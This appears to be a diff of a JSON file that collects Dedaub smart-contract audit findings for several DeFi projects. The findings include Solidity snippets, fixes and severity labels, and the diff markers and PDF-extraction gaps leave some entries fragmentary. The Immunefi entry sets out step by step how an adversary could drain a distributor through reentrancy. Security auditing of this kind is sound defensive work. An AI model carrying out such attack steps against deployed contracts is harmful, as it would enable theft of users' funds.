error. If the newly deposited amounts are large, delaying them might introduce a larger error than restarting the period. So we propose to follow a hybrid approach, alternating between the two extremes: keep a pending amount whose vesting has not started yet, and will start no later than the end of the current period, but possibly earlier if that is preferable. When a new amount arrives, we compute how much error would be introduced by starting a new vesting period, and how much error would be introduced if we delayed the new amount, and choose the approach with the smallest error. This report is accompanied by a Jupyter notebook with a discussion of this method, a prototype implementation and some simulations. The proposed method has the following properties: It needs O(1) time and is only marginally more complicated than the simple method. It is guaranteed to vest at least as much as the simple method, and never more than the maximum amount. In order to introduce vesting delays one needs to add new funds to the system, larger than the ones currently being vested. Resolution: This issue was addressed by an improved logic that resets the time period only on stake operations, improving the accuracy while simplifying the code. OTHER / ADVISORY ISSUES: This section details issues that are not thought to directly affect the functionality of the project, but we recommend considering them. ", "labels": [ "Dedaub", "GYSR - Mar '23", "Severity: Medium" ] }, { "title": "", "html_url": "https://github.com/dedaub/audits/tree/main/GYSR/GYSR - Mar '23.pdf", "body": "is not correctly overridden in ERC20BondStakingModule RESOLVED The ERC20BondStakingModule contract overrides the ERC721::_beforeTokenTransfer() hook. However, the overriding hook does not have the same signature as the original one, causing compilation to fail. The missing part is the 4th argument, which should have been another uint256.
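The fix is mechanical; a sketch of the corrected override (the unnamed fourth parameter is the batchSize introduced by newer OpenZeppelin versions): function _beforeTokenTransfer( address from, address to, uint256 tokenId, uint256 /* batchSize */ ) internal override { if (from != address(0)) _remove(from, tokenId); if (to != address(0)) _append(to, tokenId); } The two signatures, for comparison: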
ERC721::_beforeTokenTransfer() function _beforeTokenTransfer( address from, address to, uint256, /* firstTokenId */ uint256 batchSize ) internal virtual { if (batchSize > 1) { if (from != address(0)) { _balances[from] -= batchSize; } if (to != address(0)) { _balances[to] += batchSize; } } } ERC20BondStakingModule::_beforeTokenTransfer() function _beforeTokenTransfer( address from, address to, uint256 tokenId ) internal override { if (from != address(0)) _remove(from, tokenId); if (to != address(0)) _append(to, tokenId); }", "labels": [ "Dedaub", "GYSR - Mar '23", "Severity: Informational" ] }, { "title": "", "html_url": "https://github.com/dedaub/audits/tree/main/GYSR/GYSR - Mar '23.pdf", "body": "tests RESOLVED There are some cases in the test scripts that fail due to the wording changes that OZ introduced at commit fbf235661e01e27275302302b86271a8ec136fea. They updated the revert messages of the approve(), transferFrom() and safeTransferFrom() functions from: ERC721: caller is not token owner nor approved to: ERC721: caller is not token owner or approved However, the tests haven't been updated to reflect the new changes, so they fail. The affected tests are the following: aquarium.js LoC: 113 - when token transfer has not been approved erc20bondstakingmodule.js LoC: 1680 - when user transfers a bond position they do not own LoC: 1689 - when user safe transfers a bond position they do not own LoC: 1699 - when user transfers a bond position that they already transferred", "labels": [ "Dedaub", "GYSR - Mar '23", "Severity: Informational" ] }, { "title": "", "html_url": "https://github.com/dedaub/audits/tree/main/GYSR/GYSR - Mar '23.pdf", "body": "gas optimization RESOLVED Since the protocol tries to keep gas consumption to the minimum possible, we suggest here a minor optimization in ERC20FixedRewardModule. The pos.updated value could be updated inside the if statement in the code below, instead of having to check again whether the period has ended or not. ERC20FixedRewardModule::claim() function claim( bytes32 account, address, address receiver, uint256, bytes calldata ) external override onlyOwner returns (uint256, uint256) { ... if (block.timestamp > end) { e = d; } else { uint256 last = pos.updated; e = (d * (block.timestamp - last)) / (end - last); } ... // Dedaub: This update could be moved into the if statement above, // avoiding rechecking whether the period has ended pos.updated = uint128(block.timestamp < end ? block.timestamp : end); ... }", "labels": [ "Dedaub", "GYSR - Mar '23", "Severity: Informational" ] }, { "title": "", "html_url": "https://github.com/dedaub/audits/tree/main/GYSR/GYSR - Mar '23.pdf", "body": "comment in OwnerController RESOLVED The OwnerController contract provides functionality for the rest of the protocol contracts to manage their owners and their controllers. However, while the comments of the transferOwnership() function state that the owner can renounce ownership by transferring to address(0), this is not possible with the current code, as it reverts when the newOwner address is 0. OwnerController::transferOwnership() /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * This can include renouncing ownership by transferring to the zero * address. Can only be called by the current owner. 
*/ function transferOwnership(address newOwner) public virtual override { requireOwner(); require(newOwner != address(0), \"oc3\"); emit OwnershipTransferred(_owner, newOwner); _owner = newOwner; } A5 Compiler bugs INFO The code is compiled with Solidity 0.8.18. Version 0.8.18, at the time of writing, has no known bugs.", "labels": [ "Dedaub", "GYSR - Mar '23", "Severity: Informational" ] }, { "title": "out of gas situation in RewardDistributor and DecollateralisationManager contract ", "html_url": "https://github.com/dedaub/audits/tree/main/Solid World/Solid World Audit - Feb '23.pdf", "body": " DISMISSED The RewardsDistributor::getAllUnclaimedRewardAmountsForUserAndAssets() function performs a nested loop that iterates over all possible rewards for all amounts staked by a given user. Since both of these quantities are potentially unbounded, an out-of-gas error may eventually occur. // RewardsDistributor.sol::getAllUnclaimedRewardAmountsForUserAndAssets function getAllUnclaimedRewardAmountsForUserAndAssets( address[] calldata assets, address user ) external view override returns (address[] memory rewardsList, uint[] memory unclaimedAmounts) { RewardsDataTypes.AssetStakedAmounts[] memory assetStakedAmounts = _getAssetStakedAmounts(assets, user); rewardsList = new address[](_rewardsList.length); unclaimedAmounts = new uint[](rewardsList.length); for (uint i; i < assetStakedAmounts.length; i++) { for (uint r; r < rewardsList.length; r++) { rewardsList[r] = _rewardsList[r]; unclaimedAmounts[r] += _assetData[assetStakedAmounts[i].asset] .rewardDistribution[rewardsList[r]] .userReward[user] .accrued; if (assetStakedAmounts[i].userStake == 0) { continue; } unclaimedAmounts[r] += _computePendingRewardAmountForUser( user, rewardsList[r], assetStakedAmounts[i] ); } } return (rewardsList, unclaimedAmounts); } Similarly, the function getBatchesDecollateralizationInfo() of the contract DecollateralisationManager loops over all batchIds, the number of which could be unbounded. As already mentioned, this might eventually lead to an out-of-gas failure. // DecollateralisationManager.sol::getBatchesDecollateralizationInfo() function getBatchesDecollateralizationInfo( SolidWorldManagerStorage.Storage storage _storage, uint projectId, uint vintage ) external view returns (DomainDataTypes.TokenDecollateralizationInfo[] memory result) { DomainDataTypes.TokenDecollateralizationInfo[] memory allInfos = new DomainDataTypes.TokenDecollateralizationInfo[]( _storage.batchIds.length ); uint infoCount; for (uint i; i < _storage.batchIds.length; i++) { uint batchId = _storage.batchIds[i]; if ( _storage.batches[batchId].vintage != vintage || _storage.batches[batchId].projectId != projectId ) { continue; } (uint amountOut, uint minAmountIn, uint minCbtDaoCut) = _simulateDecollateralization( _storage, batchId, DECOLLATERALIZATION_SIMULATION_INPUT ); // Dedaub: part of the code is omitted for brevity infoCount = infoCount + 1; } result = new DomainDataTypes.TokenDecollateralizationInfo[](infoCount); for (uint i = 0; i < infoCount; i++) { result[i] = allInfos[i]; } } This issue was discussed with the Solid World team, who estimated that the protocol will not use enough reward tokens, stakes or batchIds to cause it to run out of gas. 
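Should these views ever need to scale past those estimates, the standard mitigation is to bound each loop with an explicit window. A minimal sketch (the function and parameter names are ours, not part of the audited code, and assume access to the batchIds array): function getBatchIdsPaginated(uint start, uint count) external view returns (uint[] memory page) { uint end = start + count; if (end > _storage.batchIds.length) { end = _storage.batchIds.length; } page = new uint[](end - start); for (uint i = start; i < end; i++) { page[i - start] = _storage.batchIds[i]; } } An off-chain caller can then walk the array in fixed-size chunks instead of making one unbounded call.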
LOW SEVERITY: ID Description ", "labels": [ "Dedaub", - "Vesper Pools+Strategies September", + "Solid World", "Severity: Medium" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Vesper Finance/Vesper Pools+Strategies September Audit.pdf", - "body": "rewards might get stuck in CompoundXYStrategy Dismissed (as above) 6 The _beforeMigration hook of CompoundXYStrategy calls _repay and lets it handle the claim of COMP and its conversion to collateral, thus no COMP needs to be transferred to the new strategy prior to migration. However, the claim in _repay happens only when the condition _repayAmount > _borrowBalanceHere evaluates to true, which might not always hold prior to migration, leading to COMP getting stuck in the strategy. This is because COMP is declared a reserved token and thus cannot be swept after migration.", + "html_url": "https://github.com/dedaub/audits/tree/main/Solid World/Solid World Audit - Feb '23.pdf", + "body": "use of the override modifier in several contracts RESOLVED In several contracts (most of which have been forked from Aave), many functions are marked with the override modifier when no such function is actually inherited from a parent contract. These are probably leftovers from the time (prior to Solidity 0.8.8) when the override keyword was mandatory when a contract was implementing a function from a parent interface: EmissionManager: configureAssets setRewardOracle setDistributionEnd setEmissionPerSecond updateCarbonRewardDistribution setClaimer setRewardsVault setEmissionManager setSolidStaking setEmissionAdmin setCarbonRewardsManager getRewardsController getEmissionAdmin getCarbonRewardsManager RewardsController: getRewardsVault
is never entered via Compounds", + "html_url": "https://github.com/dedaub/audits/tree/main/Solid World/Solid World Audit - Feb '23.pdf", + "body": "events could incorporate additional information INFO Creation events, CategoryCreated, ProjectCreated, BatchCreated, could include more information related to the category, project or batch associated with them.", "labels": [ "Dedaub", - "Vesper Pools+Strategies September", - "Severity: Medium" + "Solid World", + "Severity: Informational" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Vesper Finance/Vesper Pools+Strategies September Audit.pdf", - "body": "The checkpoint method only considers proting strategies when computing the total prots of a pools strategies Resolved The checkpoint() method of the VFRStablePool iterates over the pools strategies to compute their total prots and update the pools predictedAPY state variable: address[] memory strategies = getStrategies(); uint256 profits; // SL: Is it ok that it doesn't consider strategies at a loss? for (uint256 i = 0; i < strategies.length; i++) { (, uint256 fee, , , uint256 totalDebt, , , ) = IPoolAccountant(poolAccountant).strategy(strategies[i]); uint256 totalValue = IStrategy(strategies[i]).totalValueCurrent(); if (totalValue > totalDebt) { uint256 totalProfits = totalValue - totalDebt; uint256 actualProfits = totalProfits - ((totalProfits * fee) / MAX_BPS); profits += actualProfits; } } The above computation disregards the losses of any strategies that are not proting. Due to that the predicted APY value will not be accurate. 7", + "html_url": "https://github.com/dedaub/audits/tree/main/Solid World/Solid World Audit - Feb '23.pdf", + "body": "related gas optimization RESOLVED The elds of DomainDataTypes::Category struct can be reordered to be tighter packed in 4 instead of 5 storage slots. // DomainDataTypes.sol::Category struct Category { uint volumeCoefficient; uint40 decayPerSecond; uint16 maxDepreciation; uint24 averageTA; uint totalCollateralized; uint32 lastCollateralizationTimestamp; uint lastCollateralizationMomentum; } // Dedaub: tighter packed version struct Category { uint volumeCoefficient; uint40 decayPerSecond; uint16 maxDepreciation; uint24 averageTA; uint32 lastCollateralizationTimestamp; uint totalCollateralized; uint lastCollateralizationMomentum; } We measured that in certain test cases the use of less SLOAD and STORE instructions reduced the gas consumption by around 1.5-2% and did not cause any regression in 1 terms of gas consumption (and of course correctness). Resolved in commit b3e79c2456ecca913be0165fd49992eba8e6e1. A4 Compiler version and possible bugs RESOLVED The code is compiled with the floating pragma ^0.8.16. It is recommended that the pragma is xed to a specic version. Versions ^0.8.16 of Solidity in particular, have some known bugs, which we do not believe aect the correctness of the contracts. Resolved in commit d68cfaf512d5eb8da646780350713d6c98ad7da2. 1", "labels": [ "Dedaub", - "Vesper Pools+Strategies September", - "Severity: Medium" + "Solid World", + "Severity: Informational" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Vesper Finance/Vesper Pools+Strategies September Audit.pdf", - "body": "CompoundXY strategy does not account for rapid rise of Resolved borrow token price (This issue was also used earlier as an example in our architectural recommendations.) The CompoundXY strategy seeks to repay a borrowed amount if its value rises more than expected. 
However, volatile assets can rise or drop in price dramatically. (E.g., a collateral stablecoin can lose its peg, or a tokens price can double in hours.) This means that the Compound loan may become undercollateralized. In this case, the borrowed amount may be worth more than the collateral, so it would be benecial for the strategy to not repay the loan. Furthermore, it might be the case that the collateral gets liquidated before the strategy rebalances. In this case the strategy will be left with borrow tokens that it can neither transfer nor swap. The strategy can be enhanced to account for the rst of these cases, and the overall architecture can adopt an emergency rescue mechanism for possibly stuck funds. This emergency rescue would be a centralization element, so it should only be authorized by governance. M6 CompoundXYStrategy, CompoundLeverageStrategy: Error code of Mostly Resolved Compound API calls ignored, can lead to silent failure of functionality The calls to many state-altering Compound API calls return an error code, with a 0-value indicating success. These error codes are often ignored, which can cause certain parts of the strategies functionality to fail, silently. The calls with their error status ignored are: CompoundXYStrategy::constructor: Comptroller.enterMarkets() CompoundXYStrategy::updateBorrowCToken: Comptroller.exitMarket(), Comptroller.enterMarkets(), CToken.borrow() CompoundXYStrategy::_mint: CToken.mint() (is returned but not check by the callers of _mint()) CompoundXYStrategy::_reinvest: CToken.borrow() CompoundXYStrategy::_repay: CToken.repayBorrow() CompoundXYStrategy::_withdrawHere: CToken.redeemUnderlying() CompoundLeverageStrategy::_mint: CToken.mint() CompoundLeverageStrategy::_redeemUnderlying: CToken.redeemUnderlying() CToken.redeem(), CompoundLeverageStrategy::_borrowCollateral: CToken.borrow() CompoundLeverageStrategy::_repayBorrow: CToken.repayBorrow() 8 Low Severity Nr. Description", + "html_url": "https://github.com/dedaub/audits/tree/main/Furucombo/Furucombo smart wallet and gelato audit Sep 21.pdf", + "body": "use of weak blacklists Furucombo Gelato makes use of a number of blacklists including: - Who can create a new task - What task can be created It is however trivial for any user to get around this blacklisting style. For instance, in the case of a task, one can simply add some additional calldata which does not aect the semantics of the task. Therefore, if there is a reason to blacklist users or tasks, a stronger mechanism needs to be designed. L2 delegateCallOnly methods not properly guarded in Actions CLOSED In TaskExecutor the delegateCallOnly() modier is dened to ensure that the batchExec() method is only called via delegate call, as intended by the deployers. This can be reused by the other Actions as well, to make sure that they are not misused. 0 OTHER/ ADVISORY ISSUES: This section details issues that are not thought to directly aect the functionality of the project, but we recommend addressing them. ", "labels": [ "Dedaub", - "Vesper Pools+Strategies September", - "Severity: Medium" + "Furucombo smart wallet and gelato", + "Severity: Low" + ] + }, + { + "title": "pragma ", + "html_url": "https://github.com/dedaub/audits/tree/main/Furucombo/Furucombo smart wallet and gelato audit Sep 21.pdf", + "body": " CLOSED The floating pragma pragma solidity ^0.6.0; is used in most contracts, allowing them to be compiled with the 0.6.0 - 0.6.12 versions of the Solidity compiler. 
Although the differences between these versions are small, floating pragmas should be avoided and the pragma should be fixed to the version that will be used for the contracts' deployment. A2 Compiler known issues INFO The contracts were compiled with the Solidity compiler 0.6.12 which, at the time of writing, has multiple issues related to memory arrays. Since furucombo-smart-wallet makes heavy use of memory arrays, sending and receiving these to third-party contracts, it is worth considering switching to a newer version of the Solidity compiler.", + "labels": [ + "Dedaub", + "Furucombo smart wallet and gelato", + "Severity: Informational" + ] + }, + { + "title": "code ", + "html_url": "https://github.com/dedaub/audits/tree/main/Chainlink/Chainlink Uniswap Anchored View.pdf", + "body": " RESOLVED In UniswapLib.sol, the struct Slot0 definition is not being used. It is recommended that it be removed as it is dead code.", + "labels": [ + "Dedaub", + "Chainlink Uniswap Anchored View", + "Severity: Informational" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Vesper Finance/Vesper Pools+Strategies September Audit.pdf", - "body": "ALPHA rewards are not claimed on-chain Status Open The _claimRewardsAndConvertTo() method of the Alpha lend strategy does not do what its name and comments indicate it does. It only converts the claimed ALPHA tokens. The actual claiming of the funds does not appear to happen using an on-chain API.", + "html_url": "https://github.com/dedaub/audits/tree/main/Chainlink/Chainlink Uniswap Anchored View.pdf", + "body": "simplification RESOLVED In UniswapConfig.sol, all getTokenConfigBy* functions have a check that the index is not type(uint).max, however this is redundant, as getTokenConfig already covers this case by checking that index < numTokens. For example: function getTokenConfigBySymbolHash(bytes32 symbolHash) public view returns (TokenConfig memory) { uint index = getSymbolHashIndex(symbolHash); // Dedaub: Redundant check; getTokenConfig checks that index < numTokens. That check covers the case where index == type(uint).max // if (index != type(uint).max) { return getTokenConfig(index); } revert(\"token config not found\"); } Can be simplified to: function getTokenConfigBySymbolHash(bytes32 symbolHash) public view returns (TokenConfig memory) { uint index = getSymbolHashIndex(symbolHash); return getTokenConfig(index); }", "labels": [ "Dedaub", - "Vesper Pools+Strategies September", + "Chainlink Uniswap Anchored View", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Chainlink/Chainlink Uniswap Anchored View.pdf", + "body": "trailing modifier parentheses DISMISSED There are a couple of instances where even zero-argument modifiers are used with parentheses, even though these can be omitted. For example, in UniswapAnchoredView::activateFailover: function activateFailover(bytes32 symbolHash) external onlyOwner() { ... 
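// Dedaub (illustration, not from the audited code): the parentheses are optional,
// so the declaration can equivalently read:
// function activateFailover(bytes32 symbolHash) external onlyOwner { ... }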
} This pattern can be found in: UniswapAnchoredView::activateFailover UniswapAnchoredView::deactivateFailover Ownable::transferOwnership", "labels": [ "Dedaub", "Chainlink Uniswap Anchored View", "Severity: Informational" ] }, { "title": "", "html_url": "https://github.com/dedaub/audits/tree/main/Chainlink/Chainlink Uniswap Anchored View.pdf", "body": "sanity check for fixed price assets RESOLVED In the UniswapAnchoredView constructor, fixed price assets (either ETH or USD pegged) check that the provided uniswap market is zero, however the reporter field is unchecked. It is recommended that the reporter be also required to be zero, for consistency: else { require(uniswapMarket == address(0), \"only reported prices utilize an anchor\"); // Dedaub: Check that reporter is also 0 require(config.reporter == address(0), \"only reported prices utilize a reporter\"); }", "labels": [ "Dedaub", "Chainlink Uniswap Anchored View", "Severity: Informational" ] }, { "title": "", "html_url": "https://github.com/dedaub/audits/tree/main/Chainlink/Chainlink Uniswap Anchored View.pdf", "body": "functionality is cryptic (fetchAnchorPrice) RESOLVED The correctness of the calculation in UniswapAnchoredView::fetchAnchorPrice is very hard to establish. More comments would help. Specifically, the code reads function fetchAnchorPrice(TokenConfig memory config, uint conversionFactor) internal virtual view returns (uint) { uint256 twap = getUniswapTwap(config); uint rawUniswapPriceMantissa = twap; uint unscaledPriceMantissa = rawUniswapPriceMantissa * conversionFactor; uint anchorPrice = unscaledPriceMantissa * config.baseUnit / ethBaseUnit / expScale; return anchorPrice; } The correctness of this calculation depends on the following understanding, which should be documented in code comments, or the functionality is entirely cryptic. (We note that the original UAV code had similar comments, although the ones below are our own.) getUniswapTwap returns the price between the baseUnits of the two tokens in a pair, scaled to e18. rawUniswapPriceMantissa * config.baseUnit: price of 1 token (instead of one baseUnit of token), relative to the baseUnit of the other token, still scaled at e18. unscaledPriceMantissa * config.baseUnit / expScale: (mathematically, not in integer arithmetic) price of 1 token relative to the baseUnit of the other, scaled at 1. unscaledPriceMantissa * conversionFactor * config.baseUnit / ethBaseUnit / expScale: in the case of ETH-USDC, conversionFactor is ethBaseUnit, and the above happens to return 1 ETH's price in USDC with 6 decimals of precision, just because the USDC unit has 6 decimals; in the case of other tokens, the conversionFactor is the 6-decimal ETH-USDC price, hence the result is the price of 1 token relative to 1 ETH, at 6-decimal precision.", "labels": [ "Dedaub", "Chainlink Uniswap Anchored View", "Severity: Informational" ] }, { "title": "", "html_url": "https://github.com/dedaub/audits/tree/main/Chainlink/Chainlink Uniswap Anchored View.pdf", "body": "warning RESOLVED The Solidity compiler is issuing a warning for the UniswapAnchoredView::priceInternal function, that the return variable may be unassigned. 
While this is a false warning, it can be easily suppressed with a simple refactoring of the form: function priceInternal(TokenConfig memory config) internal view returns (uint) { if (config.priceSource == PriceSource.REPORTER) return prices[config.symbolHash].price; else if (config.priceSource == PriceSource.FIXED_USD) return config.fixedPrice; else { uint usdPerEth = prices[ethHash].price; require(usdPerEth > 0, \"ETH price not set, cannot convert to dollars\"); return usdPerEth * config.fixedPrice / ethBaseUnit; } }", "labels": [ "Dedaub", "Chainlink Uniswap Anchored View", "Severity: Informational" ] }, { "title": "", "html_url": "https://github.com/dedaub/audits/tree/main/Chainlink/Chainlink Uniswap Anchored View.pdf", "body": "code (UniswapConfig::getTokenConfig) RESOLVED The expression: ((isUniswapReversed >> i) & uint256(1)) == 1 ? true : false can be shortened to the more elegant: ((isUniswapReversed >> i) & uint256(1)) == 1", "labels": [ "Dedaub", "Chainlink Uniswap Anchored View", "Severity: Informational" ] }, { "title": "", "html_url": "https://github.com/dedaub/audits/tree/main/Chainlink/Chainlink Uniswap Anchored View.pdf", "body": "pragma RESOLVED The floating pragma pragma solidity ^0.8.7; is used in most contracts, allowing them to be compiled with any version of the Solidity compiler v0.8.* after, and including, v0.8.7. Although the differences between these versions are small, floating pragmas should be avoided and the pragma should be fixed to the version that will be used for the contract deployment (Solidity version 0.8.7 at the audit commit hash). A9 Compiler known issues INFO The contracts were compiled with the Solidity compiler v0.8.7 which, at the time of writing, has some known bugs. We inspected the bugs listed for version 0.8.7 and concluded that the subject code is unaffected", "labels": [ "Dedaub", "Chainlink Uniswap Anchored View", "Severity: Informational" ] }, { "title": "", "html_url": "https://github.com/dedaub/audits/tree/main/Primitive Finance/Primitive Finance V2.pdf", "body": "margins mapping indexing in SwapManager::swap RESOLVED Method SwapManager::swap performs an internal balance deposit on the margins mapping when params.toMargin evaluates to true. The margins mapping is a double mapping, going from a PrimitiveEngine address to a user address to the user's margin. Instead of indexing the first mapping with params.engine and the second with msg.sender, indexing is implemented the other way around, leading to invalid PrimitiveHouse state. H2 Incorrect margin deposit value in SwapManager::swap RESOLVED There is a second issue with the margins mapping update operation in SwapManager::swap (the one discussed in issue H1). The deposited amount of tokens is deltaIn instead of deltaOut, which creates inconsistency between the states of PrimitiveEngine and PrimitiveHouse and in general is not consistent with the protocol's logic. The following snippet addresses both this issue and issue H1: if (params.toMargin) { margins[params.engine][msg.sender].deposit( params.riskyForStable ? params.deltaOut : 0, params.riskyForStable ? 0 : params.deltaOut ); } [After our report, the Primitive Finance team identified that the deltaOut amount was deposited in the wrong margin, i.e., deltaOut risky in the stable margin and the other way around. Consequently, the above example has the ternary operator result expressions inverted in its final form.] 
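[For concreteness, our reconstruction of that final form, not quoted verbatim from the codebase: if (params.toMargin) { margins[params.engine][msg.sender].deposit( params.riskyForStable ? 0 : params.deltaOut, params.riskyForStable ? params.deltaOut : 0 ); }] 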
MEDIUM SEVERITY: [No medium severity issues] LOW SEVERITY: ", "labels": [ "Dedaub", "Primitive Finance V2", "Severity: High" ] }, { "title": "Flash-Loan Functionality ", "html_url": "https://github.com/dedaub/audits/tree/main/Primitive Finance/Primitive Finance V2.pdf", "body": " DISMISSED PrimitiveEngine::swap can actually be used to get flash loans from the Primitive reserves. However, this functionality is not documented and may have been implemented by mistake. One can get flash loans by implementing a contract with the swapCallback function. When this gets called by the engine, the output ER", "labels": [ "Dedaub", "Primitive Finance V2", "Severity: Low" ] }, { "title": "", "html_url": "https://github.com/dedaub/audits/tree/main/Primitive Finance/Primitive Finance V2.pdf", "body": "have already been transferred to the engine contract, and all that is required for the rest of the transaction to succeed is to transfer the input tokens back.", "labels": [ "Dedaub", "Primitive Finance V2", "Severity: Critical" ] }, { "title": "", "html_url": "https://github.com/dedaub/audits/tree/main/Primitive Finance/Primitive Finance V2.pdf", "body": "Multicall Error Handling OPEN The Multicall error handling mechanism assumes a fixed ABI for error messages. This would have worked in Solidity 0.7.x for the default Error(string) ABI. However, Solidity has custom ABIs for 0.8.x that can encode valid errors with a shorter returndata. The correct way to propagate errors is to re-raise them (e.g., by copying the returndata to the revert input data).", "labels": [ "Dedaub", "Primitive Finance V2", "Severity: Low" ] }, { "title": "", "html_url": "https://github.com/dedaub/audits/tree/main/Primitive Finance/Primitive Finance V2.pdf", "body": "Reserve Balance Mechanisms DISMISSED The balances of the two reserve tokens in the engine are sometimes tracked by incrementing/decrementing internal counters and sometimes by checking balanceOf(). This not only causes the system to read more storage locations, and thus consume more gas, but it also automatically disqualifies tokens that have dynamic balances, such as aTokens. L4 Fixed Swap Fee Might Not Compensate Theta Decay For All Asset Pairs SPEC CHANGED Options, manifesting themselves as asset pairs of different types, will encode different proportions of intrinsic and extrinsic value. 
Although the swap fee is meant to compensate for theta decay, it seems strange that this cannot be set per curve or per token pair. We note, however, that other important parameters such as sigma are customizable. OTHER/ADVISORY ISSUES: This section details issues that are not thought to directly affect the functionality of the project, but we recommend considering them. ", "labels": [ "Dedaub", "Primitive Finance V2", "Severity: Low" ] }, { "title": "always returns true ", "html_url": "https://github.com/dedaub/audits/tree/main/Primitive Finance/Primitive Finance V2.pdf", "body": " RESOLVED Transfers::safeTransfer's return value is always true (as noted in a comment), so it can be removed as an optimization.", "labels": [ "Dedaub", "Primitive Finance V2", "Severity: Informational" ] }, { "title": "", "html_url": "https://github.com/dedaub/audits/tree/main/Primitive Finance/Primitive Finance V2.pdf", "body": "zero liquidity check in PrimitiveEngine::remove RESOLVED PrimitiveEngine::remove does not revert in case of 0 provided liquidity, which leads to unnecessary computation and gas fees for the user. PrimitiveHouse::remove implements an early check for such a scenario.", "labels": [ "Dedaub", "Primitive Finance V2", "Severity: Informational" ] }, { "title": "", "html_url": "https://github.com/dedaub/audits/tree/main/Primitive Finance/Primitive Finance V2.pdf", "body": "Bookkeeping and Transfers DISMISSED The architecture as it currently stands, and the relationship between PrimitiveHouse and PrimitiveEngine, causes multiple token transfers to intermediate contracts, and multiple layers of bookkeeping, with some redundancy. This causes the application to consume more gas. DISMISSED: The specific architecture is highly desired by the protocol developers. Nevertheless, a few transfer operations have been optimized. A4 No engine-risky-stable sanity check in PrimitiveHouse create and allocate methods RESOLVED In PrimitiveHouse::create and PrimitiveHouse::allocate the user has to provide the PrimitiveEngine address and the addresses of the risky and stable tokens, while there is no early check that ensures the pair of risky and stable tokens provided corresponds to the engine address. This check is implemented in the respective callback functions, maintaining the security of the protocol. 
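For illustration, an early check could take the hypothetical form require(factory.getEngine(risky, stable) == params.engine, \"engine mismatch\"); the factory lookup is our assumption and not an API taken from the codebase. 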
However, the execution of the contract will only revert at such a late point (i.e., in the callback) even if a user provides a wrong engine, risky and stable token triplet by mistake, leading to unnecessary gas consumption, which could have been avoided with an early check.", "labels": [ "Dedaub", "Primitive Finance V2", "Severity: Informational" ] }, { "title": "", "html_url": "https://github.com/dedaub/audits/tree/main/Immunefi/Immunefi audit Jul 21.pdf", "body": "adversary can alter the amount in Distributor.deposit Resolved (but since the entire VestingNFTReceiver is removed, similar threats need to be considered in the context of the new architecture upon future audits) Distributor::deposit computes the withdrawAmount by comparing the balance before and after the transfer: uint256 initialBalance = _thisBalance(token); if (token == NATIVE_ASSET) { payable(receiver).sendValue(amount); } else { token.safeTransfer(receiver, amount); } uint256 finalBalance = _thisBalance(token); require(initialBalance > finalBalance, \"Distributor: did not withdraw\"); uint256 withdrawAmount = initialBalance - finalBalance; An adversary who controls the deposit of funds to the distributor can start withdrawing, and deposit funds back to the distributor from within his receive hook. This will cause the distributor to register a possibly much smaller withdrawAmount than the amount actually withdrawn. When used in combination with VestingNFTReceiver, an attack can be executed as follows: First, the adversary withdraws an amount from vesting into the distributor, by calling VestingNFTReceiver::withdraw via Distributor::call Then the adversary starts withdrawing the same amount from the distributor (even if the amount is larger than his own share) From within his receive hook, the adversary releases an equal amount (minus 1 wei) from vesting to the distributor (again by calling VestingNFTReceiver::withdraw via Distributor::call) As a result, the distributor registered a withdrawal of just 1 wei, and the adversary can withdraw again. Using the above procedure, an adversary with only a 1% share can withdraw all funds from the distributor in a single transaction. An exploit of this vulnerability has been implemented and will be provided together with this report. This vulnerability can be prevented by a cross-contract lock that prevents entering VestingNFTReceiver::withdraw while Distributor::withdraw is active. A lighter (but less robust) solution is to add the following check: require(withdrawAmount >= amount) One should also keep in mind a symmetric but harder to exploit vulnerability: if the victim calls Distributor::withdraw, and in his receive hook triggers some untrusted code (e.g., transfers the received funds), the adversary can do a nested Distributor::withdraw, causing the distributor to register a larger withdrawn amount for the victim than the real one (hence increasing the adversary's share). A nonReentrant guard in Distributor::withdraw prevents this. 
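Concretely, for the lighter fix above (a sketch, with a revert message of our own choosing): immediately after uint256 withdrawAmount = initialBalance - finalBalance; add require(withdrawAmount >= amount, \"Distributor: nested deposit detected\"); so that a re-entering deposit can no longer shrink the registered withdrawal. 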
The general recommendation at the end of C2 also applies here. C2 The adversary can transferOwnership on vestingNFTReceiver Resolved Via Distributor::call, an adversary can call VestingNFTReceiver::transferOwnership to change ownership to himself, which then allows him to call VestingNFTReceiver::withdraw directly (not via the distributor) and receive all vesting funds. This can be solved by removing the transferOwnership method and baking the owner into the VestingNFTReceiver during initialization. As a general recommendation, having a general-purpose Distributor contract which allows arbitrary interactions with VestingNFTReceiver via Distributor::call makes it much harder to design a safe interface. We recommend using a distributor contract with exactly the needed functionality, possibly even merged with VestingNFTReceiver. This would easily solve C2, and would also make it easy to add a lock that solves C1. High Severity ", "labels": [ "Dedaub", "Immunefi", "Severity: Critical" ] }, { "title": "", "html_url": "https://github.com/dedaub/audits/tree/main/Immunefi/Immunefi audit Jul 21.pdf", "body": "logic error in SumVesting combinator schedule Status Dismissed (intended behavior, assumptions on vesting schedules will be clearly stated) In the combinator schedule SumVesting.sol it is implicitly assumed that the result of the sub-controllers for both getVested() and getWeight() is linearly dependent on the input amount: function getVested(CommonParameters calldata input) external pure override returns (uint256 result) { [...] for (uint256 i; i < subControllers.length; i++) { IVestingController subController = subControllers[i]; uint256 share = subShares[i]; // Dedaub: should be input.amount * share/totalShares // Dedaub: but the division happens in the end nextInput.amount = share * input.amount; totalShares += share; [...] result += subController.getVested(nextInput); } result /= totalShares; } Thus the whole input amount is passed to all sub-controllers, only to divide the accumulated result amount by totalShares at the very end. While this assumption holds in the case of simple schedules, such as CliffVesting and LinearVesting, it may not hold for more complex ones that may be added in the future. Similarly, an inaccurate input amount is passed to the sub-controllers in functions getContext(), createInitialState() and triggerEvent().", "labels": [ "Dedaub", "Immunefi", "Severity: Informational" ] }, { "title": "", "html_url": "https://github.com/dedaub/audits/tree/main/Immunefi/Immunefi audit Jul 21.pdf", "body": "testing that a transaction succeeded Resolved The following test is taken from test/commentary_tests.js : await expect(Notary.connect(Operator).submitCommentary(BYTES32_STRING)); await expect(Notary.connect(Operator).submitCommentary(BYTES32_ZERO)).to.be.reverted; It seems that the intention of the first line is to test that submitCommentary succeeded without reverting. 
